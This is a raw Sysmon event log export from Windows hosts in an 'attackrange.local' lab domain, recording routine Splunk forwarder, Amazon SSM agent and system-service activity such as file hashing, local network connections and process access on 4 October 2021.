23542300x800000000000000080898Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:52.868{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC5480F72132D81D6B829396F941BC3,SHA256=805996C3CCEF93032FC079253667B8D3263219928B347A322AE924371B6D3E5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080897Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:52.013{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-020MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102975Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:50.341{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49485-false10.0.1.12-8000- 13241300x8000000000000000102974Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:52.076{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0x227b6f49) 23542300x800000000000000080900Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:53.869{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1094499977B8C76090A8020CC91B58C4,SHA256=963A3195B804A45D1FC21EFA91E7D30FEB2FF77A86EB2B2A2D1FFED02888B4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102977Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:53.466{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA987C96A9DEFA00D974E6FDBB010BA1,SHA256=7FD413FDD74589E309CEE138A858251A7914D811D08B7FEB14DA4A0ECEDF95A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080899Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:53.026{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-021MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080901Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:54.869{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8CA1CE825D90BC4950374050B894795,SHA256=95AE0FE2C21AEA98732A8A9DE31BACA322E3A88549D8981F9BDBF103283671CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102978Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:54.482{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970BB57362107E90AB98BD9C4AF09E6B,SHA256=FC073F63AEA95B7581803CB105C2CA0F680009B02122C625840819BF97D2595B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080903Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:55.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39ED74834EEF5ADDDE80BABAAC9C560A,SHA256=D79823FD40BB392EFDBDE1CA1B82E1171688F82479F33D6A55EA79CAF7D40088,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102980Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:55.978{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000102979Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:55.513{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5381EAB9F53375F393573F95C65B4260,SHA256=C35D54C9C6A98D60EF64E4A0D4152BE48170CDBA314829FB680FF4738C41F1E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080902Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:52.669{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49991-false10.0.1.12-8000- 23542300x8000000000000000102982Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:56.760{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102981Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:56.541{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E8B0E01CAFC9D6575B6DBC94C7ED769,SHA256=7F443818C2030409C4E70FA506EF1A1A4C3B75148E37EF35177F6C814808435D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080904Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:56.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F557A691128E167D8F6A2CCE8CA047,SHA256=6B002309C87E6EAF24615AEE21E865D457961A86E8DF71BCD6B7749FF0B021ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080905Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:57.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A3ED044DD4AF35060EA078111BB1A80,SHA256=4D3587B9A2D34CBE0A5F339F190093087A907959E83ADA4A82BE26CBD0FF4DB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102983Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:57.557{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6FD6829E9BA4CCAF9E79E0BAA1F2D5A,SHA256=B774015AEE3B4603F3407C38421979C31F13147EF18A7E2B2A6021834A1160FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080906Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:58.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F7BA4C7297BFB45502D76C70DEDDE0,SHA256=297FE218D7A85F4E33A5B49AFCD5AE83F2BA8D79AFE1C80AE5BEC373ACF8E921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000102994Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.650{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1AE-615A-B501-00000000FC01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102993Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.650{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102992Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.650{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102991Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.650{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102990Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.650{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102989Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.650{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B1AE-615A-B501-00000000FC01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000102988Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.650{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1AE-615A-B501-00000000FC01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000102987Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.651{58E9C193-B1AE-615A-B501-00000000FC01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000102986Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.557{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB1809FA2F0208A57F4D25230431CF42,SHA256=1B9C1F7FE813FA7B7EFE502490FAAC89F0F0FEA674A3D3D0616FEA1556EF7E1E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102985Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:56.978{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49487-false10.0.1.12-8089- 354300x8000000000000000102984Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:56.384{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49486-false10.0.1.12-8000- 23542300x800000000000000080920Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25C65F2396B67D8CE778625CDB7B99C6,SHA256=3093DF99F1C12F32396A028136BC118D53413997F83DB2CA3A5406630CA30971,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103009Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.807{58E9C193-B1AF-615A-B601-00000000FC01}63286848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103008Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.603{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1AF-615A-B601-00000000FC01}6328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103007Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.603{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103006Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.603{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103005Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.603{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103004Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.603{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103003Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.603{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B1AF-615A-B601-00000000FC01}6328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103002Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.603{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1AF-615A-B601-00000000FC01}6328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 